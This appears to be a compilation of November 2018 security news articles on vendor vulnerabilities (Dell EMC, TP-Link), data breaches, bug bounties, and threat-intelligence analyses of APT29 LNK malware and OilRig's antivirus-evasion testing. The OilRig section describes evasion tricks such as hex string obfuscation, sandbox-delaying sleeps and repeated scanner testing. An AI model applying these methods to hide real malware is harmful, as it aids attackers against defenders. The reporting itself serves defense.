Experts found flaws in Dell EMC and VMware Products. Patch them now!
22.11.2018 securityaffairs Vulnerebility
Security experts have found several vulnerabilities affecting Dell EMC Avamar and Integrated Data Protection Appliance products. They also warn that VMware’s vSphere Data Protection, which is based on Avamar, is also affected by the issues.
Dell EMC released security updates for Dell EMC Avamar Client Manager in Dell EMC Avamar Server and Dell EMC Integrated Data Protection Appliance (IDPA) to address a critical remote code execution issue and a medium open redirection flaw.
Dell acknowledged the cybersecurity firm TSS for the discovery of the flaws.
The remote code execution vulnerability, tracked as CVE-2018-11066, could be exploited by a remote unauthenticated attacker to execute arbitrary commands on the vulnerable server.
Affected versions are Dell EMC Avamar Client Manager in Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0, 7.4.1, 7.5.0, 7.5.1, 18.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1 and 2.2.
“Dell EMC Avamar Client Manager in Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0, 7.4.1, 7.5.0, 7.5.1, 18.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1 and 2.2 contain a Remote Code Execution vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to execute arbitrary commands on the server.” reads the security advisory published.
The vulnerability received a CVSS v3 Base Score of 9.8.
The second issue, tracked as CVE-2018-11067 can be exploited by an unauthenticated attacker to redirect users to arbitrary URLs by tricking them into clicking on a specially crafted link.
Dell also disclosed a high severity information exposure vulnerability, tracked as CVE-2018-11076, that affects the above products. The flaw could be exploited by attackers to compromise the vulnerable systems, it affects Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0 and 7.4.1 and Dell EMC Integrated Data Protection Appliance (IDPA) 2.0.
“Dell EMC Avamar and IDPA are affected by an Information Exposure vulnerability that may potentially be exploited by an attacker to compromise the affected systems.” reads the security advisory published by the company.
“Avamar Java management console’s SSL/TLS private key may be leaked in the Avamar Java management client package. The private key could potentially be used by an unauthenticated attacker on the same data-link layer to initiate a MITM attack on management console users.”
Since VMware vSphere Data Protection (VDP) is based on the Avamar Virtual Edition, it is also affected by the flaws. The virtualization giant published a security advisory to inform its customers that the issues affect the VDP 6.0.x and 6.1.x..
Amazon UK is notifying a data breach to its customers days before Black Friday
22.11.2018 securityaffairs Spam
Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch that is notifying them an accidental data leak.
The news is disconcerting, Amazon has suffered a data breach a few days before Black Friday
Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch that is notifying them an accidental data leak.
Amazon informed its customers that it had “inadvertently disclosed [their] name and email address due to a technical error”.
The messages include an HTTP link to the company website and read:
We’re contacting you to let you know that our website inadvertently disclosed your name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.
Sincerely, Customer Service”
Drew Alden - Looking for Work!
When are companies like @Amazon going to realize how to write a proper breach letter? Once again this sounds scammy as shit and has a completely unnecessary link at the bottom.
7:05 AM - Nov 21, 2018
See Drew Alden - Looking for Work!'s other Tweets
Twitter Ads info and privacy
The Register confirmed that the email is genuine and that was sent by Amazon UK, the press office acknowledged its authenticity.
“We have fixed the issue and informed customers who may have been impacted.” states the press office.
At the time of writing, it is unclear the number of affected customers, whether Amazon had informed the Information Commissioner’s Office.
The company did not disclose technical details of the incident, it is not known the root cause of the incident.
The Register pointed out that not only UK customers are receiving a data breach notification from the Amazon, but people from the US, the Netherlands and South Korea also claim to have received the same message.
Facebook increases rewards for its bug bounty program and facilitate bug submission
22.11.2018 securityaffairs Social
Facebook updates its bug bounty program, it is increasing the overall rewards for security flaws that could be exploited to take over accounts.
Facebook announced an important novelty for its bug bounty, the social media giant is going to pay out as much as $40,000 for vulnerabilities that can be exploited to hack into accounts without user interaction.
The Facebook bug bounty program will cover also other companies owned by the social network giant, including Instagram, WhatsApp, and Oculus.
Vulnerabilities that require a minimum user interaction for the exploitation will be paid out $25,000.
“The researchers who find vulnerabilities that can lead to a full account takeover, including access tokens leakage or the ability to access users’ valid sessions, will be rewarded an average bounty of:
* $40,000 if user interaction is not required at all, or
* $25,000 if minimum user interaction is required.” reads the post published by Facebook.
“By increasing the award for account takeover vulnerabilities and decreasing the technical overhead necessary to be eligible for bug bounty, we hope to encourage an even larger number of high quality submissions from our existing and new white hat researchers to help us secure over 2 billion users.”
The bug bounty programs are becoming crucial for companies to assess their products and infrastructure and to avoid data breaches.
In September a vulnerability in the ‘View As’ feature allowed hackers to steal access tokens that could be used by attackers to hijack accounts and access to third-party apps that used Facebook as an authentication platform.
Facebook Data Breach
Facebook revealed that hackers accessed data of 29 Million users, a number that is less than initially thought of 50 million.
Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches.
For the remaining one million users affected by the Facebook Data Breach whose “access tokens” were stolen, no data was accessed.
The hackers started on September 14 with 400,000 “seed accounts” they were controlling directly then they expanded their activity to their networks.
Facebook aims at encouraging white hat hackers in reporting critical flaws in the social media platform by increasing the awards for bug bounty program and facilitate the process to report account hacking issued.
“By increasing the award for account takeover vulnerabilities and decreasing the technical overhead necessary to be eligible for bug bounty, we hope to encourage an even larger number of high quality submissions from our existing and new white hat researchers to help us secure over 2 billion users.” concludes Facebook.
US Postal Service has patched a critical bug that allowed anyone who has an account at usps.com to view and modify account details for other users
US Postal Service has patched a critical bug that allowed anyone who has an account at usps.com to view and modify account details for other users, some 60 million users were affected.
The news was first reported by the popular investigator Brian Krebs who was contacted by a researcher who discovered the issue.
The researchers, who asked to remain anonymous, reported the flaw to the USPS more than a year ago, but the company ignored him. After the public disclosure of the issue, USPS fixed the issue.
The problem resides in the USPS Informed Visibility API designed to to let businesses, advertisers and other bulk mail senders “make better business decisions by providing them with access to near real-time tracking data” about mail campaigns and packages.
“In addition to exposing near real-time data about packages and mail being sent by USPS commercial customers, the flaw let any logged-in usps.com user query the system for account details belonging to any other users, such as email address, username, user ID, account number, street address, phone number, authorized users, mailing campaign data and other information.” reads the post on KrebsonSecurity blog.
“Many of the API’s features accepted “wildcard” search parameters, meaning they could be made to return all records for a given data set without the need to search for specific terms.”
The researcher discovered that using the API to search for one specific data element (i.e. an address) it was possible to retrieve multiple accounts that shared the data.
“For example, a search on the email addresses for readers who volunteered to help with this research turned up multiple accounts when those users had more than one user signed up at the same physical address.” continues Krebs.
“This is not good,” said one anonymous reader who volunteered to help with this research, after viewing a cut-and-paste of his USPS account details looked up via his email address. “Especially since we moved due to being threatened by a neighbor.”
USPS implemented a validation step to prevent unauthorized changes with some specific data fields.
When a user attempt to modify the email address associated with a specific USPS account via the API it is prompted a confirmation message sent to the email address tied to that account.
The good news is that it seems that API doesn’t expose USPS account passwords.
“The API at issue resides here; a copy of the API prior to its modification on Nov. 20 by the USPS is available here as a text file.” continues Krebs.
Such kind of flaws is very dangerous, spammers could abuse them to several malicious purposes, including phishing campaigns.
Krebs also pointed out that a vulnerability assessment of Informed Visibility was published in October 2018 by the USPS’s Office of Inspector General (OIG).
Auditors discovered several authentication and encryption flaws that evidently were underestimated.
“The USPS told the OIG it had addressed the authentication problems raised in the audit report, which appear to have been related to how data was encrypted in transit.”
Two hackers involved in the TalkTalk hack sentenced to prison
21.11.2018 securityaffairs Crime
Two men from Tamworth, Staffordshire were sentenced to prison for their roles in the 2015 TalkTalk hack.
Two men, Connor Allsopp, 21, and Matthew Hanley, 23, pleaded guilty to charges of hacking. Allsopp has been sentenced to 8 months in jail and Hanley to 12 months.
In October 2015, TalkTalk Telecom Group plc publicly disclosed that four million subscribers have been impacted by a “sustained cyberattack” that hit its servers. The figures were downgraded later, the company revealed that only 156,959 customers were affected.
Hackers accessed to names, addresses, dates of birth, email addresses and phone numbers of the company customers, they also accessed financial data for 15,000 users.
Attackers also attempted to blackmail the telecoms TalkTalk CEO, Dido Harding.
“We have been contacted by, I don’t know whether it is an individual or a group purporting to be the hacker,” Dido Harding said to the BBC. “It is a live criminal investigation. All I can say is I have personally received a contact from someone purporting as I say…to be the hacker looking for money.”
The security breach had a significant impact on the company, overall losses have been estimated at £77 million ($99 million).
The U.K. Information Commissioner’s Office (ICO) handed a £400,000 ($510,000) record fine to TalkTalk for the data breach.
Other people, were arrested after the TalkTalk security breach, most of them were youngsters.
In the weeks after the attack, the police arrested of a 15-year-old teen from Northern Ireland and a 16-year-old boy from Feltham.
In November 2015, another young hacker from Norwich was arrested by the British police.
Cybaze ZLab – Yoroi team analyzed malware used in recent attacks on US entities attributed to APT29
21.11.2018 securityaffairs APT
Malware researchers from Cybaze ZLab – Yoroi team have detected a new strain of malware that appears to be associated with a new wave of attacks carries out by Russia linked APT29 group.
The researchers of Yoroi ZLab, on 16 November, accessed to a new APT29’s dangerous malware which seems to be involved in the recent wave of attacks aimed at many important US entities, such as military agencies, law enforcement, defense contractors, media companies and pharmaceutical companies.
“The Department is aware of the recent malicious cyber event involving the spoofing (impersonation) of a Department employee reported by U.S. cybersecurity firm FireEye. No Department networks were compromised by this malicious cyber attempt.” reads the statement released by the State Department.
Many experts and media outlets attributed the attack to the Russian APT group.
Threat actors carried out spear phishing attacks impersonating a State Department official to attempt compromising targets, the attacks are similar to the ones associated with Russia-linked group APT29 (aka The Dukes, Cozy Bear, and Cozy Duke).
APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.
Moreover, many independent security researchers posted on Twitter about this news and currently, they are busy with the analysis of this threat.
Looking at (alleged) #APT29 LNK 2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c - simple, yet effective, evasion for people just grabbing shit from VT and such and trying to run the damn thing.
4:07 PM - Nov 16, 2018
19 people are talking about this
Twitter Ads info and privacy
Great work @jfslowik
Replying to @jfslowik
Last thing on possible #APT29 shenanigans. These get referenced but haven't gotten far enough to see just how they're leveraged, both the full named one and the pattern:
So - if you have named pipe visibility, something to look for.
7:43 PM - Nov 16, 2018
See Drunk Binary's other Tweets
Twitter Ads info and privacy
The threat actors have spread the malware through spear-phishing messages containing a zip file as an attachment. This file simply contains a link (.lnk) file with incredible capabilities.
When the victim double-clicks on the link file, it starts different malicious activities:
It runs a Powershell command with which extracts another Powershell script from a hidden section of the .lnk file. This payload is contained from the location 0x0005E2BE to the location 0x0000623B6 of the file.
The second script provides to create two new files: a legitimate pdf document (ds7002.pdf) and a dll file (cyzfc.dat) that probably contains the real payload.
The PDF document, written into “%APPDATA%\Local\Temp”, is opened automatically from the malware if a PDF viewer is installed into the infected system. This action seems to be a mislead attempt: the purpose is to confuse the user while the malware executes some other malicious activities.
The DLL is written into “%APPDATA%\Local” and it is launched through the second Powershell command. It tries to contact the address “pandorasong.com” and interacts with this site using the HTTPS protocol. The C2C is currently down, so the malware is unable to continue with its malicious activities. However, the Yoroi Zlab’s researchers have intercepted a request to the C2C, as shown in the following figure:
At the time of the analysis, it is not yet clear the real purpose of the malware because the C2C is down. Moreover, it doesn’t seem to implement any techniques to get persistence on the infected system.
Experts will publish a detailed technical analysis of the malicious DLL in the forthcoming weeks.
Below IoCs for themalware
Experts analyzed how Iranian OilRIG hackers tested their weaponized documents
21.11.2018 securityaffairs APT
Security experts at Palo Alto Networks analyzed the method used by Iran-linked OilRig APT Group to test weaponized docs before use in attacks.
Security researchers Palo Alto Networks have analyzed the techniques adopted by Iran-linked APT group OilRig (aka APT34) to test the weaponized documents before use in attacks.
The OilRig hacker group is an Iran-linked APT that has been around since at least 2015, since then it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.
The testing activity analyzed by Palo Alto Network preceded the August 2018 attacks on a Middle-Eastern government.
The APT group targeted members of an undisclosed government in the Middle East with an evolved variant of the BondUpdater trojan.
In mid-August, the state-sponsored hackers launched a highly targeted spear-phishing email to a high-ranking office in a Middle Eastern nation.
“In August 2018, Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER. BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization.” reads the analysis published by Palo Alto Networks.
“The spear-phishing email had an attached Microsoft Word document that contained a macro responsible for installing a new variant of BONDUPDATER.”
The hackers used spear-phishing emails to deliver an updated version of the PowerShell-based BondUpdater Trojan. The BONDUPDATER Trojan implements common backdoor features such as uploading and downloading files, as well as executing commands on the infected system.
The spear-phishing messages use a weaponized document with a macro responsible for downloading and executing a new variant of BondUpdater.
The macro runs the VBScript “AppPool.vbs” that creates a scheduled task that is executed every minute to ensure persistence to the BONDUPDATER Trojan.
The attacks were launched on August 26, the hackers created numerous bait documents a few days before to test the evasion ability of the malicious code.
The hackers tested weaponized documents and the TwoFace webshell, they measured the evasion abilities of the malicious code using anti-virus scanning tools.
Six days before the attack, hackers submitted the malicious documents to anti-virus engines, Palo Alto researchers observed three distinct waves of testing and the last bait document was submitted less than 8 hours before the delivery document was created.
The final document was then delivered to the target within 20 minutes after its creation.
“The timeline in Figure 1 shows a gap in testing activity between August 21st and August 26th, when the tester stopped their activities. However, they later continued by making modifications to the Excel document just prior to the attack on August 26th. The last iteration of testing occurring less than 8 hours before the creation time of the Word delivery document used in the targeted attack.” reads the analysis published by Palo Alto Networks.
OilRig hackers submitted a total of 11 samples across several public anti-virus testing sites. Experts noticed that the threat actors tested Microsoft Excel spreadsheets, but the final delivery document was a Microsoft Word file. OilRig hackers used the macro from the malicious Excel document as the basis for the malicious Word document.
Hackers obfuscated the “powershell” and “cmd.exe” strings within the embedded VBScript using the same string obfuscation technique
“the detection rate of the file fell or rose as the tester modified the spreadsheet during each iteration of testing. These changes in detection rates allow the tester to determine if the modified portion of the file was causing detection.” continues the analysis.
Some of the modification to the documents caused in an increase in detection rates, this information helped the attackers determine what specific portions in the bait file would trigger anti-virus detections.
Below some of the activities performed during tests:
We learned that OilRig:
Made changes to documents and quickly uploaded the file for testing, with an average of 33 seconds between the file creation times and the testing time.
Was not concerned about maintaining the macro’s functionality during testing efforts, as the changes made by the tester in many iterations made the macro no longer work as intended.
Will change the functions to run dropped VBScripts, specifically in this case from the Shell object to the built-in Shell function.
Will add sleep functionality in an attempt to evade sandboxes, specifically in this case using the Wait function.
Has a preferred string obfuscation technique, which involves replacing a string with each character in hexadecimal form that are concatenated together.
“Attackers and groups routinely use file and URL scanning services to help develop and modify their malware to evade detections.” “Gaining this developmental insight sheds light on OilRig’s advanced capabilities, giving us a more complete threat actor profile.” the researchers conclude.
“Comparison between what malware is eventually used in active campaigns versus in-development malware allows us to understand what adaptations and modifications were made to each iteration of malware. Additionally, witnessing specific functionality changes within the malware itself, we attempt to make correlations between the new and old functionality,”
Further details on the testing technique and changes applied to the documents are included in the analysis published by Palo Alto Networks.
TP-Link fixes 2 Remote Code Execution flaws in TL-R600VPN SOHO Router and other issues
21.11.2018 securityaffairs Vulnerebility
TP-Link has addressed several vulnerabilities, including a remote code execution flaw, in its TL-R600VPN small and home office (SOHO) router.
TP-Link as fixed four security vulnerabilities in the TL-R600VPN small and home office (SOHO) router that were reported by experts at Cisco Talos.
The vulnerabilities are two remote code execution (RCE) flaws(CVE-2018-3950, CVE-2018-3951), a denial-of-service issue (CVE-2018-3948), and a server information disclosure bug (CVE-2018-394).
The DOS and server information disclosure vulnerabilities are caused by the lack of input sanitization and parsing errors.
The lack of proper input sanitization can be exploited without authentication to trigger DoS conditions and leak server information.
Both remote code execution flaws can only by a malicious logged-in user, or by a malicious code that got the necessary credential.
Talos experts explained that parsing errors require an authenticated session for exploitation, a circumstance that can lead to remote code execution under the context of HTTPD. The HTTPD process runs as root, this means that the code would be executed with elevated privileges.
The CVE-2018-3948 DoS flaw affects the URI-parsing function of the TL-R600VPN HTTP server.
“An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server.” reads the advisory published Cisco reports.
“If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn’t need to be authenticated,”
The embedded HTTP server can expose sensitive system files due to a directory traversal flaw (CVE-2018-3949) that can be exploited by both authenticated and unauthenticated attackers. An unauthenticated or an authenticated attacker can trigger the flaw by using a specially crafted URL.
One of the two RCE issues, tracked as CVE-2018-3950, resided in the ping and traceroute functions of the TL-R600VPN HTTP server. The devices fils to check the size of the data passed to its ‘ping_addr’ field when performing a ping operation.
“An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its ‘ping_addr’ field when performing a ping operation.” states Cisco Talos.
“By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device’s HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.”
The last issue is a remote code execution flaw tracked as CVE-2018-3951 that resides in the HTTP header-parsing function of the TL-R600VPN HTTP server.
An authenticated attacker can trigger a buffer overflow vulnerability by sending a specially crafted HTTP request, this leads a remote code execution.
“During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request,” states the advisory.
TP-Link has released firmware updates that address the flaws, owners of the TL-R600VPN routers urge to update their devices as soon as possible.
Security researchers at F-Secure have recently uncovered a small spam campaign aimed at delivering spyware to Mac users that use Exodus wallet.
Security experts at F-Secure have recently spotted a small spam campaign aimed at Mac users that use Exodus cryptocurrency wallet.
The campaign leverages Exodus-themed phishing messages using an attachment named “Exodus-MacOS-1.64.1-update.zip.” The messages were sent by accounts associated with the domain “update-exodus[.]io”, the attackers used it to trick victims into believing that it was a legitimate domain used by the Exodus organization.
The malware poses itself as a fake Exodus update, it is using the subject “Update 1.64.1 Release – New Assets and more”. Experts pointed out that the latest released version for Exodus is 1.63.1.
The zip archive includes an application created earlier this month that contains a mach-O binary with the filename “rtcfg”.The researchers analyzed the code and found several strings and references to the “realtime-spy-mac[.]com” website, a cloud-based remote spy software for Mac systems.
“From the website, the developer described their software as a cloud-based surveillance and remote spy tool. Their standard offering costs $79.95 and comes with a cloud-based account where users can view the images and data that the tool uploaded from the target machine.” states the blog post published by F-Secure. “The strings that was extracted from the Mac binary from the mail spam coincides with the features mentioned in the realtime-spy-mac[.]com tool.”
Experts searching for similar instances of the Mac keylogger in the F-Secure repository and found other applications, including taxviewer.app, picupdater.app, macbook.app, and launchpad.app.
“Based on the spy tool’s website, it appears that it does not only support Mac, but Windows as well. ” concludes F-Secure. “It’s not the first time that we’ve seen Windows threats target Mac. As the crimeware threat actors in Windows take advantage of the cryptocurrency trend, they too seem to want to expand their reach, thus also ended up targeting Mac users.”
Further details about the campaign, including IoCs are reported in the analysis published by F-Secure.
CVSS Scores Often Misleading for ICS Vulnerabilities: Experts
20.11.2018 securityweek Vulnerebility
While the Common Vulnerability Scoring System (CVSS) can be useful for rating vulnerabilities, the scores assigned to flaws affecting industrial control systems (ICS) may be misleading, which can have negative consequences for organizations, particularly if they rely solely on CVSS for prioritizing patches.
Maintained by the CVSS Special Interest Group (SIG), CVSS “provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity.” The score, which reflects the severity of a vulnerability, should help organizations assess and prioritize weaknesses in their systems. The score can reflect a low (0.1-3.9), medium (4.0-6.9), high (7.0-8.9) or critical (9.0-10.0) severity.
The current version of the system, CVSSv3, allows users to calculate a base score – which is constant over time and across environments – using factors such as attack vector, attack complexity, required privileges, user interaction, scope, confidentiality, integrity, and availability. The temporal score, which reflects characteristics that may change over time but not across environments, is calculated based on exploit code maturity, remediation level, and report confidence. The environmental score, which represents attributes relevant to a particular user’s environment, is calculated based on the importance of the affected asset, measured in terms of confidentiality, integrity and availability.
The way a CVSS score is calculated is transparent, but it’s still not uncommon for vendors and researchers to disagree on the severity rating assigned to a vulnerability.
In a presentation at SecurityWeek’s ICS Cyber Security Conference in Atlanta last month, Radiflow CEO and Founder Ilan Barda pointed out that CVSS scoring was originally developed for IT systems and is often not accurate in the case of industrial systems, which can be problematic for organizations. Several other industrial cybersecurity experts contacted by SecurityWeek agree.
The use of CVSS for rating ICS vulnerabilities
Moreno Carullo, co-founder and CTO of Nozomi Networks, believes that while CVSS has value because it standardizes vulnerability scoring, it should only serve as a guide.
“You should always have a look at the vector and evaluate your own ‘score,’ based on what makes the most sense for your environment,” Carullo said.
Paolo Emiliani, industrial and SCADA research security analyst at Positive Technologies, says the CVSS score should be applied to specific industrial processes for it to be efficient in prioritizing vulnerabilities.
Vladimir Dashchenko, head of vulnerability research at Kaspersky Lab’s ICS CERT group, noted that the classic CVSS can be useful for OT environments as it shows how a vulnerability can “become a problem from an IT point of view.” The problem, he says, it that it does not take into account the impact on technological processes and the possible cyber-physical impact of a flaw.
“The difference between IT and OT brings up not a negative impact, but more like an unsaid meaning,” Dashchenko explained. “The OT/ICS community always says ‘those IT bugs work differently in an OT environment,’ and this is true. We see a totally different potential impact for the business owners in the IT and OT fields. For OT, sometimes this impact can be calculated not only in money, but also in physical damage and people’s lives.”
John Elder, senior ICS security consultant at Applied Risk, believes CVSS scores can be misleading in both IT and ICS environments due to the different scenarios required for exploitation. However, he says the CVSS score can be a good starting point when assessing the full impact of a vulnerability.
Sipke Mellema, who is also an ICS security consultant at Applied Risk, agrees that CVSS scores can be misleading for both IT and OT. “The main problem with ICS is that it's closely bound to physical security, with which CVSS scoring doesn’t fit well (how would you score a social engineering attack?),” he told SecurityWeek.
Learn More About ICS Vulnerabilities at SecurityWeek’s ICS Cyber Security Conference
Radiflow’s CTO, Yehonatan Kfir, believes that the environmental score is more appropriate for ICS, but it’s in most cases ignored. In the case of industrial systems – unlike in the case of IT, where confidentiality is most important – availability is most important as any disruption to processes can have serious financial and physical consequences.
“Another argument against the effectiveness of CVSS scoring for ICS devices is the numerical values of the exploitability weights,” Kfir told SecurityWeek. “The current numerical weight values are calculated based on historical and statistical data of cyber-incidents, which are mostly from IT networks. As a consequence, the scoring based on this method is biased against ICS devices as there is not a wide historical database of incidents for numerically estimating the ‘exploitability’ value on ICS networks.”
SecurityWeek has also reached out to ICS-CERT for an opinion on the effectiveness of CVSS scoring – all of the agency’s advisories list CVSS scores for disclosed vulnerabilities – but its vulnerability management team has not made any comments on the topic.
Examples of misleading CVSS scores
Unsurprisingly, the representatives of companies involved in finding vulnerabilities in ICS products can provide several examples of flaws that have been assigned low CVSS scores despite posing a serious risk to industrial environments.
David Atch, VP of research at CyberX, provided CVE-2015-5374 as an example. This vulnerability was exploited by the notorious Industroyer/Crashoverride malware to perform a DoS attack on Siemens SIPROTEC relays, but it only has a CVSS score of 7.8.
“Because SIPROTEC devices have a significant role in power generation environments, the score of 7.8 doesn't fully reflect the true risk,” Atch explained.
Kaspersky’s Dashchenko pointed to CVE-2017-6021, a DoS vulnerability in Schneider Electric’s EcoStruxure Geo SCADA Expert (ClearSCADA) remote SCADA management software.
Dashchenko highlighted that DoS flaws are often not considered too severe in the case of IT systems, but they can cause serious damage if exploited.
Radiflow’s Kfir makes an interesting comparison between CVE-2018-7795, a cross-site scripting (XSS) flaw in Schneider Electric’s PowerLogic PM5560 power management system, and CVE-2018-7789, a DoS vulnerability the expert found in Schneider’s Modicon M221 PLCs.
The first security hole has a CVSS score of 8.2, while the DoS flaw, which allows an attacker to remotely reboot a PLC, has a CVSS score of only 4.8. However, if availability and integrity are taken into account, the score for the DoS vulnerability increases to 8.1. If availability and integrity are taken into account in the case of the XSS flaw, its score drops to 7.1, Kfir said.
“While comparing those two CVEs without the additional optional scoring, it may seem that CVE-2018-7795 is much more critical,” Kfir explained. “However, when re-scoring with additional weights to availability, it is clear that the PLC reboot (CVE-2018-7789) is more critical than a confidentiality issue in a power management system.”
Applied Risk researchers pointed out that a vulnerability with a low CVSS score may have a significant impact when combined with other flaws.
“We recently discovered multiple critical vulnerabilities in a device, which will have high CVSS scores (i.e. command injection as root user.) These vulnerabilities require authentication to exploit,” Elder explained. “However, there is also a directory traversal vulnerability in the same device, which will have a lower CVSS score. Using this vulnerability, you can retrieve the necessary credentials to login to the device and exploit the aforementioned higher scored vulnerabilities.”
Impact of misleading CVSS scores on organizations
Misleading CVSS scores can have a serious impact on industrial organizations, according to the experts contacted by SecurityWeek.
“The misleading score makes it more difficult for the operators of ICS networks to prioritize the risk to their devices and to their physical processes,” Kfir said. “The vulnerability assessment tools used today detect vulnerabilities and provide users with scores according to the CVSS metric. Prioritizing the vulnerability fixes and mitigations merely according to the CVSS score will not necessarily result in dealing with the highest risks.”
CyberX’s Atch believes that misleading CVSS scores can have a negative impact on industrial organizations “because users might ignore mitigation of high-risk vulnerabilities because they have a lower score. For example, they might skip patching or, if they are unable to patch, implementing compensating controls such as continuous monitoring and network segmentation.”
Elder says he is not aware of any industrial company that prioritizes vulnerabilities based only on their CVSS score. On the other hand, the researcher notes that there are however many systems that are not patched at all.
Adapting CVSS to ICS and alternative scoring systems
Some experts believe that CVSS can still work for ICS vulnerabilities as long as the score is adapted accordingly and not used on its own. Recommendations include focusing on the environmental score, assessing the impact of a flaw in the context of the entire environment rather than just the impacted software or device, and using CVSS in conjunction with other risk assessment methods.
“The optimal approach is a risk-based rating that takes into account the potential impact of a compromise as well as the ease of exploitation. How crucial is the device to the ICS environment? Could the vulnerability be exploited in a chain of compromises resulting in major safety or environmental issues or costly downtime?” said Atch.
“Experts like Idaho National Labs (INL) recommend a risk-based approach to prioritize mitigation of vulnerabilities, using threat modeling to identify the highest-risk attack vectors to your most important assets and processes (your ‘crown jewels’),” he added.
Others believe the industry should work together on developing a new scoring system that focuses on the factors that are critical for ICS security. While this has occasionally been discussed, we are a long way from a new system actually being implemented and used on a wide scale.
“My preference goes out to just using CIA, or AIC for ICS, as it's easier to get your head around,” said Applied Risk’s Mellema. “With both CVSS and AIC it's very important that the company specifies what would be of high impact for them. Research must evolve around some questions. ‘We want to know how well these and these documents are secured’. ‘We want to know if an attacker in position x can do y’.”
“The scoring system doesn't really matter,” Mellema added. “It all really depends on communication with the customer. For example, a crackable Wifi password can mean the end of the world for one company with poor network segregation from IT to OT. For other companies that has a thousand layers between their Wifi and their OT infrastructure it would be a minor inconvenience.”
Hackers Earn $1 Million for Zero-Day Exploits at Chinese Competition
20.11.2018 securityweek Exploit
White hat hackers earned more than $1 million for exploits disclosed at the Tianfu Cup PWN hacking competition that took place on November 16-17 in Chengdu, the capital of China's Sichuan province.
The contest ran alongside the Tianfu Cup conference and is similar to Zero Day Initiative’s Pwn2Own – they both offer significant prizes and in both cases the demonstrated vulnerabilities are disclosed to their respective vendors. However, at this year’s Pwn2Own events combined – Pwn2Own 2018 and Pwn2Own Tokyo 2018 – hackers earned roughly $600,000.
At the Tianfu Cup PWN competition, participants earned a total of $120,000 for two Microsoft Edge exploits that allowed remote code execution. Two Chrome exploit chains earned hackers a total of $150,000.
Three teams received the same amount for Safari vulnerabilities, including $100,000 for an exploit demonstrated on macOS.
The highest single reward, $200,000, was paid out to contestants who demonstrated an iPhone X jailbreak and a remote code execution exploit.
Tianfu Cup organizers told SecurityWeek that this iPhone X exploit involved a type confusion Just-in-Time (JIT) bug in Safari and a use-after-free vulnerability in the iOS kernel. The hackers promised to make details available after Apple pushes a fix.
Researchers also earned $120,000 for two Oracle VirtualBox exploit chains, and $100,000 for hacking VMware Workstation and Fusion.
VMware has confirmed that the vulnerabilities allow an attacker to execute code on the Workstation host from the guest. The company says it’s working on addressing the flaws and promised to publish an advisory.
Earlier this month, VMware informed customers of patches for a critical virtual machine (VM) escape vulnerability disclosed recently by a researcher at the GeekPwn2018 hacking competition in China.
A Microsoft Office exploit chain involving a logical bug and a memory corruption flaw earned researchers $80,000. A total of $80,000 were paid out for three Adobe Reader hacks.
Participants also earned several thousands of dollars for hacking Vivo X23, OPPO R17 and Xiaomi Mi 8 smartphones.
There were also several attempts that did not earn participants any money due to the fact that they involved previously disclosed vulnerabilities.
According to organizers, participants earned $1,024,000 for disclosing 30 vulnerabilities. Of that amount, $620,000 was paid to a team from Chinese cybersecurity firm Qihoo 360. Independent researchers and teams from universities, Tencent, and Ant Financial, one of China's main financial services providers, also took part in the competition.
Singapore Signs Cybersecurity Agreements With US, Canada
20.11.2018 securityweek Congress
Singapore last week signed cybersecurity-related agreements with both Canada and the United States as officials from both countries visited Singapore for the 33rd ASEAN Summit.
Singapore and the United States signed a declaration of intent (DoI) for collaboration on a Cybersecurity Technical Assistance Programme for ASEAN member states whose goal is “further strengthening partnerships in regional cybersecurity capacity building” through workshops.
The DoI, which builds on a cybersecurity cooperation memorandum of understanding (MoU) signed between the two countries in August 2016, was signed by Singapore’s Cyber Security Agency and the U.S. Department of State.
The Cybersecurity Technical Assistance Programme will deliver three training workshops focusing on various aspects of enhancing technical capabilities. The workshops will take place in Singapore and other ASEAN countries, with participation from key industry partners.
“We are glad to deepen our collaboration with the US and build upon the training programmes that were previously offered in ASEAN under the ACCP. This new partnership, which will see the active involvement of key local and international cyber industry players, will help to enrich the programme content and strengthen regional cybersecurity capacity,” said David Koh, Chief Executive of CSA.
Singapore’s CSA has also signed an MoU with Canada on cybersecurity cooperation. The two countries have agreed to share information and best practices and work together on enhancing capabilities.
“The MoU will cover cybersecurity cooperation in key areas including information exchange and sharing on cyber threats and cyber-attacks, sharing of best practices on human resource development, provision of technical and certification services and development of cybersecurity standards; and collaboration on regional cybersecurity capacity building,” the CSA said. “Such exchanges will continue to strengthen Singapore’s operational cybersecurity capabilities, including critical infrastructure protection, enhance Singapore’s ongoing domestic cybersecurity ecosystem development efforts as well as advance the development of a secure and trusted regional cyberspace in ASEAN.”
